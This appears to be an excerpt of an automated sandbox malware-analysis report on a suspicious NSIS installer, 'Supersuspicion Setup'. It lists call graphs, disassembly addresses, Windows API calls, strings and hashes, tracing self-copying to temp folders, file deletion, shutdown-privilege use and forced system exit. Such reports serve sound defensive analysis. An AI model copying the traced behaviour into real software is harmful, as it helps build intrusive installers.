4024cb 5493->5494 5495 4024af 5496 4029fd 18 API calls 5495->5496 5497 4024b6 5496->5497 5500 4059c7 GetFileAttributesA CreateFileA 5497->5500 5499 4024c2 5500->5499 5508 401cb0 5509 4029e0 18 API calls 5508->5509 5510 401cc0 SetWindowLongA 5509->5510 5511 402892 5510->5511 5512 401a31 5513 4029e0 18 API calls 5512->5513 5514 401a37 5513->5514 5515 4029e0 18 API calls 5514->5515 5516 4019e1 5515->5516 5517 401e32 5518 4029fd 18 API calls 5517->5518 5519 401e38 5518->5519 5520 40501f 25 API calls 5519->5520 5521 401e42 5520->5521 5522 4054e5 2 API calls 5521->5522 5526 401e48 5522->5526 5523 401e9e CloseHandle 5525 402663 5523->5525 5524 401e67 WaitForSingleObject 5524->5526 5527 401e75 GetExitCodeProcess 5524->5527 5526->5523 5526->5524 5526->5525 5528 40609a 2 API calls 5526->5528 5529 401e87 5527->5529 5530 401e90 5527->5530 5528->5524 5532 405c94 wsprintfA 5529->5532 5530->5523 5532->5530 4218 4015b3 4219 4029fd 18 API calls 4218->4219 4220 4015ba 4219->4220 4236 40585f CharNextA CharNextA 4220->4236 4222 40160a 4223 40160f 4222->4223 4226 401638 4222->4226 4225 401423 25 API calls 4223->4225 4224 4057f1 CharNextA 4227 4015d0 CreateDirectoryA 4224->4227 4228 401616 4225->4228 4231 401423 25 API calls 4226->4231 4229 4015c2 4227->4229 4230 4015e5 GetLastError 4227->4230 4242 405d36 lstrcpynA 4228->4242 4229->4222 4229->4224 4230->4229 4233 4015f2 GetFileAttributesA 4230->4233 4235 401630 4231->4235 4233->4229 4234 401621 SetCurrentDirectoryA 4234->4235 4237 40587a 4236->4237 4239 40588a 4236->4239 4237->4239 4240 405885 CharNextA 4237->4240 4238 4058aa 4238->4229 4239->4238 4241 4057f1 CharNextA 4239->4241 4240->4238 4241->4239 4242->4234 5533 404135 5534 40414b 5533->5534 5538 404257 5533->5538 5537 403fec 19 API calls 5534->5537 5535 4042c6 5536 4042d0 GetDlgItem 5535->5536 5539 40439a 5535->5539 5543 4042e6 5536->5543 5544 404358 5536->5544 5540 4041a1 5537->5540 5538->5535 5538->5539 5545 40429b GetDlgItem SendMessageA 5538->5545 5541 404053 8 API calls 5539->5541 5542 403fec 19 API calls 5540->5542 5546 404395 5541->5546 5547 4041ae CheckDlgButton 5542->5547 5543->5544 5548 40430c 6 API calls 5543->5548 5544->5539 5549 40436a 5544->5549 5564 40400e KiUserCallbackDispatcher 5545->5564 5562 40400e KiUserCallbackDispatcher 5547->5562 5548->5544 5552 404370 SendMessageA 5549->5552 5553 404381 5549->5553 5552->5553 5553->5546 5556 404387 SendMessageA 5553->5556 5554 4042c1 5557 4043bf SendMessageA 5554->5557 5555 4041cc GetDlgItem 5563 404021 SendMessageA 5555->5563 5556->5546 5557->5535 5559 4041e2 SendMessageA 5560 404200 GetSysColor 5559->5560 5561 404209 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5559->5561 5560->5561 5561->5546 5562->5555 5563->5559 5564->5554 4248 402036 4249 4029fd 18 API calls 4248->4249 4250 40203d 4249->4250 4251 4029fd 18 API calls 4250->4251 4252 402047 4251->4252 4253 4029fd 18 API calls 4252->4253 4254 402051 4253->4254 4255 4029fd 18 API calls 4254->4255 4256 40205b 4255->4256 4257 4029fd 18 API calls 4256->4257 4258 402064 4257->4258 4259 40207a CoCreateInstance 4258->4259 4260 4029fd 18 API calls 4258->4260 4263 402099 4259->4263 4264 40214d 4259->4264 4260->4259 4261 401423 25 API calls 4262 402181 4261->4262 4263->4264 4265 40212f MultiByteToWideChar 4263->4265 4264->4261 4264->4262 4265->4264 5565 4014b7 5566 4014bd 5565->5566 5567 401389 2 API calls 5566->5567 5568 4014c5 5567->5568 4683 401bb8 4684 4029e0 18 API calls 4683->4684 4685 401bbf 4684->4685 4686 4029e0 18 API calls 4685->4686 4687 401bc9 4686->4687 4688 401bd9 4687->4688 4689 4029fd 18 API calls 4687->4689 4690 4029fd 18 API calls 4688->4690 4694 401be9 4688->4694 4689->4688 4690->4694 4691 401bf4 4695 4029e0 18 API calls 4691->4695 4692 401c38 4693 4029fd 18 API calls 4692->4693 4696 401c3d 4693->4696 4694->4691 4694->4692 4697 401bf9 4695->4697 4698 4029fd 18 API calls 4696->4698 4699 4029e0 18 API calls 4697->4699 4700 401c46 FindWindowExA 4698->4700 4701 401c02 4699->4701 4704 401c64 4700->4704 4702 401c28 SendMessageA 4701->4702 4703 401c0a SendMessageTimeoutA 4701->4703 4702->4704 4703->4704 4798 40243a 4799 402b07 19 API calls 4798->4799 4800 402444 4799->4800 4801 4029e0 18 API calls 4800->4801 4802 40244d 4801->4802 4803 402457 4802->4803 4806 402663 4802->4806 4804 402470 RegEnumValueA 4803->4804 4805 402464 RegEnumKeyA 4803->4805 4804->4806 4807 402489 RegCloseKey 4804->4807 4805->4807 4807->4806 4814 40223b 4815 402243 4814->4815 4816 402249 4814->4816 4817 4029fd 18 API calls 4815->4817 4818 4029fd 18 API calls 4816->4818 4821 402259 4816->4821 4817->4816 4818->4821 4819 4029fd 18 API calls 4822 402267 4819->4822 4820 4029fd 18 API calls 4823 402270 WritePrivateProfileStringA 4820->4823 4821->4819 4821->4822 4822->4820 4898 40173f 4899 4029fd 18 API calls 4898->4899 4900 401746 4899->4900 4901 401764 4900->4901 4902 40176c 4900->4902 4937 405d36 lstrcpynA 4901->4937 4938 405d36 lstrcpynA 4902->4938 4905 40176a 4909 405fa1 5 API calls 4905->4909 4906 401777 4907 4057c6 3 API calls 4906->4907 4908 40177d lstrcatA 4907->4908 4908->4905 4930 401789 4909->4930 4910 40603a 2 API calls 4910->4930 4911 4059a2 2 API calls 4911->4930 4913 4017a0 CompareFileTime 4913->4930 4914 401864 4916 40501f 25 API calls 4914->4916 4915 40183b 4917 40501f 25 API calls 4915->4917 4924 401850 4915->4924 4918 40186e 4916->4918 4917->4924 4919 402f1f 46 API calls 4918->4919 4920 401881 4919->4920 4921 401895 SetFileTime 4920->4921 4923 4018a7 CloseHandle 4920->4923 4921->4923 4922 405d58 18 API calls 4922->4930 4923->4924 4925 4018b8 4923->4925 4927 4018d0 4925->4927 4928 4018bd 4925->4928 4926 405d36 lstrcpynA 4926->4930 4929 405d58 18 API calls 4927->4929 4931 405d58 18 API calls 4928->4931 4933 4018d8 4929->4933 4930->4910 4930->4911 4930->4913 4930->4914 4930->4915 4930->4922 4930->4926 4934 40554a MessageBoxIndirectA 4930->4934 4936 4059c7 GetFileAttributesA CreateFileA 4930->4936 4932 4018c5 lstrcatA 4931->4932 4932->4933 4935 40554a MessageBoxIndirectA 4933->4935 4934->4930 4935->4924 4936->4930 4937->4905 4938->4906 5569 40163f 5570 4029fd 18 API calls 5569->5570 5571 401645 5570->5571 5572 40603a 2 API calls 5571->5572 5573 40164b 5572->5573 5574 40193f 5575 4029e0 18 API calls 5574->5575 5576 401946 5575->5576 5577 4029e0 18 API calls 5576->5577 5578 401950 5577->5578 5579 4029fd 18 API calls 5578->5579 5580 401959 5579->5580 5581 40196c lstrlenA 5580->5581 5582 4019a7 5580->5582 5583 401976 5581->5583 5583->5582 5587 405d36 lstrcpynA 5583->5587 5585 401990 5585->5582 5586 40199d lstrlenA 5585->5586 5586->5582 5587->5585

                                          Executed Functions

                                          Function 00403217 Relevance: 77.3, APIs: 27, Strings: 17, Instructions: 337stringfilecomCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 403217-4032ae #17 SetErrorMode OleInitialize call 406061 SHGetFileInfoA call 405d36 GetCommandLineA call 405d36 GetModuleHandleA 7 4032b0-4032b5 0->7 8 4032ba-4032cf call 4057f1 CharNextA 0->8 7->8 11 403394-403398 8->11 12 4032d4-4032d7 11->12 13 40339e 11->13 14 4032d9-4032dd 12->14 15 4032df-4032e7 12->15 16 4033b1-4033cb GetTempPathA call 4031e3 13->16 14->14 14->15 17 4032e9-4032ea 15->17 18 4032ef-4032f2 15->18 26 403423-40343d DeleteFileA call 402c79 16->26 27 4033cd-4033eb GetWindowsDirectoryA lstrcatA call 4031e3 16->27 17->18 20 403384-403391 call 4057f1 18->20 21 4032f8-4032fc 18->21 20->11 36 403393 20->36 24 403314-403341 21->24 25 4032fe-403304 21->25 32 403343-403349 24->32 33 403354-403382 24->33 30 403306-403308 25->30 31 40330a 25->31 41 4034d1-4034e0 call 403695 OleUninitialize 26->41 42 403443-403449 26->42 27->26 44 4033ed-40341d GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031e3 27->44 30->24 30->31 31->24 38 40334b-40334d 32->38 39 40334f 32->39 33->20 35 4033a0-4033ac call 405d36 33->35 35->16 36->11 38->33 38->39 39->33 55 4034e6-4034f6 call 40554a ExitProcess 41->55 56 4035da-4035e0 41->56 46 4034c1-4034c8 call 403787 42->46 47 40344b-403456 call 4057f1 42->47 44->26 44->41 53 4034cd 46->53 59 403458-403481 47->59 60 40348c-403496 47->60 53->41 57 4035e6-403603 call 406061 * 3 56->57 58 40367d-403685 56->58 89 403605-403607 57->89 90 40364d-40365b call 406061 57->90 62 403687 58->62 63 40368b-40368f ExitProcess 58->63 65 403483-403485 59->65 66 403498-4034a5 call 4058b4 60->66 67 4034fc-403516 lstrcatA lstrcmpiA 60->67 62->63 65->60 70 403487-40348a 65->70 66->41 77 4034a7-4034bd call 405d36 * 2 66->77 67->41 72 403518-40352d CreateDirectoryA SetCurrentDirectoryA 67->72 70->60 70->65 73 40353a-403562 call 405d36 72->73 74 40352f-403535 call 405d36 72->74 85 403568-403584 call 405d58 DeleteFileA 73->85 74->73 77->46 95 4035c5-4035cc 85->95 96 403586-403596 CopyFileA 85->96 89->90 94 403609-40360b 89->94 101 403669-403674 ExitWindowsEx 90->101 102 40365d-403667 90->102 94->90 98 40360d-40361f GetCurrentProcess 94->98 95->85 99 4035ce-4035d5 call 405bea 95->99 96->95 100 403598-4035b8 call 405bea call 405d58 call 4054e5 96->100 98->90 107 403621-403643 98->107 99->41 100->95 117 4035ba-4035c1 CloseHandle 100->117 101->58 106 403676-403678 call 40140b 101->106 102->101 102->106 106->58 107->90 117->95
                                          APIs
                                          • #17.COMCTL32 ref: 00403238
                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                                          • OleInitialize.OLE32(00000000), ref: 0040324A
                                            • Part of subcall function 00406061: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                            • Part of subcall function 00406061: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                            • Part of subcall function 00406061: GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                          • SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,00000160,00000000,00000009), ref: 00403272
                                            • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                          • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\ulACwpUCSU.exe",00000000), ref: 0040329A
                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\ulACwpUCSU.exe",00000020), ref: 004032C5
                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                                          • DeleteFileA.KERNELBASE(1033), ref: 00403428
                                          • OleUninitialize.OLE32(?), ref: 004034D6
                                          • ExitProcess.KERNEL32 ref: 004034F6
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ulACwpUCSU.exe",00000000,?), ref: 00403502
                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                                          • DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,00424000,?), ref: 0040357A
                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\ulACwpUCSU.exe,0041E8B8,00000001), ref: 0040358E
                                          • CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000005,00000004), ref: 00403614
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
                                          • ExitProcess.KERNEL32 ref: 0040368F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                          • String ID: "$"C:\Users\user\Desktop\ulACwpUCSU.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste$C:\Users\user\Desktop$C:\Users\user\Desktop\ulACwpUCSU.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                          • API String ID: 4107622049-327368726
                                          • Opcode ID: 0e0f6a3637583670758f503623c3da15b8d87b56266dba0afd803753b1801d7b
                                          • Instruction ID: 3d26bb40307c87b2cd60c260c775e6d0301d96a10e68b952128d49a18977981a
                                          • Opcode Fuzzy Hash: 0e0f6a3637583670758f503623c3da15b8d87b56266dba0afd803753b1801d7b
                                          • Instruction Fuzzy Hash: 85B107706082517AE721AF659D8DA2B3EACEB41706F04447FF541BA1E2C77C9E01CB6E
                                          Function 0040515D Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 118 40515d-405179 119 405308-40530e 118->119 120 40517f-405246 GetDlgItem * 3 call 404021 call 4048bd GetClientRect GetSystemMetrics SendMessageA * 2 118->120 122 405310-405332 GetDlgItem CreateThread CloseHandle 119->122 123 405338-405344 119->123 142 405264-405267 120->142 143 405248-405262 SendMessageA * 2 120->143 122->123 125 405366-40536c 123->125 126 405346-40534c 123->126 127 4053c1-4053c4 125->127 128 40536e-405374 125->128 130 405387-40538e call 404053 126->130 131 40534e-405361 ShowWindow * 2 call 404021 126->131 127->130 136 4053c6-4053cc 127->136 132 405376-405382 call 403fc5 128->132 133 40539a-4053aa ShowWindow 128->133 139 405393-405397 130->139 131->125 132->130 140 4053ba-4053bc call 403fc5 133->140 141 4053ac-4053b5 call 40501f 133->141 136->130 144 4053ce-4053e1 SendMessageA 136->144 140->127 141->140 147 405277-40528e call 403fec 142->147 148 405269-405275 SendMessageA 142->148 143->142 149 4053e7-405413 CreatePopupMenu call 405d58 AppendMenuA 144->149 150 4054de-4054e0 144->150 157 405290-4052a4 ShowWindow 147->157 158 4052c4-4052e5 GetDlgItem SendMessageA 147->158 148->147 155 405415-405425 GetWindowRect 149->155 156 405428-40543e TrackPopupMenu 149->156 150->139 155->156 156->150 159 405444-40545e 156->159 160 4052b3 157->160 161 4052a6-4052b1 ShowWindow 157->161 158->150 162 4052eb-405303 SendMessageA * 2 158->162 163 405463-40547e SendMessageA 159->163 164 4052b9-4052bf call 404021 160->164 161->164 162->150 163->163 165 405480-4054a0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 164->158 167 4054a2-4054c2 SendMessageA 165->167 167->167 168 4054c4-4054d8 GlobalUnlock SetClipboardData CloseClipboard 167->168 168->150
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 004051BC
                                          • GetDlgItem.USER32(?,000003EE), ref: 004051CB
                                          • GetClientRect.USER32(?,?), ref: 00405208
                                          • GetSystemMetrics.USER32(00000002), ref: 0040520F
                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405230
                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405241
                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405254
                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405262
                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405275
                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405297
                                          • ShowWindow.USER32(?,00000008), ref: 004052AB
                                          • GetDlgItem.USER32(?,000003EC), ref: 004052CC
                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052DC
                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052F5
                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405301
                                          • GetDlgItem.USER32(?,000003F8), ref: 004051DA
                                            • Part of subcall function 00404021: SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040531D
                                          • CreateThread.KERNEL32(00000000,00000000,Function_000050F1,00000000), ref: 0040532B
                                          • CloseHandle.KERNELBASE(00000000), ref: 00405332
                                          • ShowWindow.USER32(00000000), ref: 00405355
                                          • ShowWindow.USER32(?,00000008), ref: 0040535C
                                          • ShowWindow.USER32(00000008), ref: 004053A2
                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053D6
                                          • CreatePopupMenu.USER32 ref: 004053E7
                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053FC
                                          • GetWindowRect.USER32(?,000000FF), ref: 0040541C
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405435
                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405471
                                          • OpenClipboard.USER32(00000000), ref: 00405481
                                          • EmptyClipboard.USER32 ref: 00405487
                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 00405490
                                          • GlobalLock.KERNEL32(00000000), ref: 0040549A
                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054AE
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004054C7
                                          • SetClipboardData.USER32(00000001,00000000), ref: 004054D2
                                          • CloseClipboard.USER32 ref: 004054D8
                                          Strings
                                          • Supersuspicion Setup: Installing, xrefs: 0040544D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: Supersuspicion Setup: Installing
                                          • API String ID: 590372296-3553124451
                                          • Opcode ID: 3e6425cd8027a1822d7c02b399c2ff8f99ecd6318ec4cf5a11e34b93871bf819
                                          • Instruction ID: 24acf85f457993e5d1a00f4a74fbc0a00d7f38a893508f9c9f1f5035b4e63235
                                          • Opcode Fuzzy Hash: 3e6425cd8027a1822d7c02b399c2ff8f99ecd6318ec4cf5a11e34b93871bf819
                                          • Instruction Fuzzy Hash: 5FA15BB1900208BFDB219FA0DD89AAE7F79FB08355F10407AFA04B61A0C7B55E51DF69
                                          Function 00405D58 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 414 405d58-405d63 415 405d65-405d74 414->415 416 405d76-405d8b 414->416 415->416 417 405d91-405d9c 416->417 418 405f7e-405f82 416->418 417->418 419 405da2-405da9 417->419 420 405f88-405f92 418->420 421 405dae-405db8 418->421 419->418 423 405f94-405f98 call 405d36 420->423 424 405f9d-405f9e 420->424 421->420 422 405dbe-405dc5 421->422 426 405f71 422->426 427 405dcb-405e00 422->427 423->424 428 405f73-405f79 426->428 429 405f7b-405f7d 426->429 430 405e06-405e11 GetVersion 427->430 431 405f1b-405f1e 427->431 428->418 429->418 432 405e13-405e17 430->432 433 405e2b 430->433 434 405f20-405f23 431->434 435 405f4e-405f51 431->435 432->433 439 405e19-405e1d 432->439 436 405e32-405e39 433->436 440 405f33-405f3f call 405d36 434->440 441 405f25-405f31 call 405c94 434->441 437 405f53-405f5a call 405d58 435->437 438 405f5f-405f6f lstrlenA 435->438 443 405e3b-405e3d 436->443 444 405e3e-405e40 436->444 437->438 438->418 439->433 447 405e1f-405e23 439->447 451 405f44-405f4a 440->451 441->451 443->444 449 405e42-405e65 call 405c1d 444->449 450 405e79-405e7c 444->450 447->433 452 405e25-405e29 447->452 462 405f02-405f06 449->462 463 405e6b-405e74 call 405d58 449->463 455 405e8c-405e8f 450->455 456 405e7e-405e8a GetSystemDirectoryA 450->456 451->438 454 405f4c 451->454 452->436 458 405f13-405f19 call 405fa1 454->458 460 405e91-405e9f GetWindowsDirectoryA 455->460 461 405ef9-405efb 455->461 459 405efd-405f00 456->459 458->438 459->458 459->462 460->461 461->459 464 405ea1-405eab 461->464 462->458 467 405f08-405f0e lstrcatA 462->467 463->459 469 405ec5-405edb SHGetSpecialFolderLocation 464->469 470 405ead-405eb0 464->470 467->458 472 405ef6 469->472 473 405edd-405ef4 SHGetPathFromIDListA CoTaskMemFree 469->473 470->469 471 405eb2-405eb9 470->471 475 405ec1-405ec3 471->475 472->461 473->459 473->472 475->459 475->469
                                          APIs
                                          • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00405057,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000), ref: 00405E09
                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E84
                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E97
                                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405ED3
                                          • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405EE1
                                          • CoTaskMemFree.OLE32(00000000), ref: 00405EEC
                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F0E
                                          • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00405057,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000), ref: 00405F60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 900638850-516360298
                                          • Opcode ID: 4acb4603a534f03f61e1b5029561f8864cf9bf083dd2ad4547ff7456c33bf565
                                          • Instruction ID: 9c0e267699f90c8e910d98bdf84d4b8f2614ab6024826f89c9d009b20b1e8bc4
                                          • Opcode Fuzzy Hash: 4acb4603a534f03f61e1b5029561f8864cf9bf083dd2ad4547ff7456c33bf565
                                          • Instruction Fuzzy Hash: 10610571A04905ABDF215F64DC84B7B3BA8DB55304F10813BE641B62D1D33C4A42DF9E
                                          Function 004055F6 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 476 4055f6-40561c call 4058b4 479 405635-40563c 476->479 480 40561e-405630 DeleteFileA 476->480 482 40563e-405640 479->482 483 40564f-40565f call 405d36 479->483 481 4057bf-4057c3 480->481 484 405646-405649 482->484 485 40576d-405772 482->485 491 405661-40566c lstrcatA 483->491 492 40566e-40566f call 40580d 483->492 484->483 484->485 485->481 488 405774-405777 485->488 489 405781-405789 call 40603a 488->489 490 405779-40577f 488->490 489->481 499 40578b-40579f call 4057c6 call 4055ae 489->499 490->481 494 405674-405677 491->494 492->494 497 405682-405688 lstrcatA 494->497 498 405679-405680 494->498 500 40568d-4056ab lstrlenA FindFirstFileA 497->500 498->497 498->500 515 4057a1-4057a4 499->515 516 4057b7-4057ba call 40501f 499->516 502 4056b1-4056c8 call 4057f1 500->502 503 405763-405767 500->503 509 4056d3-4056d6 502->509 510 4056ca-4056ce 502->510 503->485 505 405769 503->505 505->485 513 4056d8-4056dd 509->513 514 4056e9-4056f7 call 405d36 509->514 510->509 512 4056d0 510->512 512->509 518 405742-405754 FindNextFileA 513->518 519 4056df-4056e1 513->519 526 4056f9-405701 514->526 527 40570e-405719 call 4055ae 514->527 515->490 521 4057a6-4057b5 call 40501f call 405bea 515->521 516->481 518->502 524 40575a-40575d FindClose 518->524 519->514 522 4056e3-4056e7 519->522 521->481 522->514 522->518 524->503 526->518 529 405703-40570c call 4055f6 526->529 535 40573a-40573d call 40501f 527->535 536 40571b-40571e 527->536 529->518 535->518 538 405720-405730 call 40501f call 405bea 536->538 539 405732-405738 536->539 538->518 539->518
                                          APIs
                                          • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040561F
                                          • lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 00405667
                                          • lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 00405688
                                          • lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040568E
                                          • FindFirstFileA.KERNELBASE(00420D00,?,?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040569F
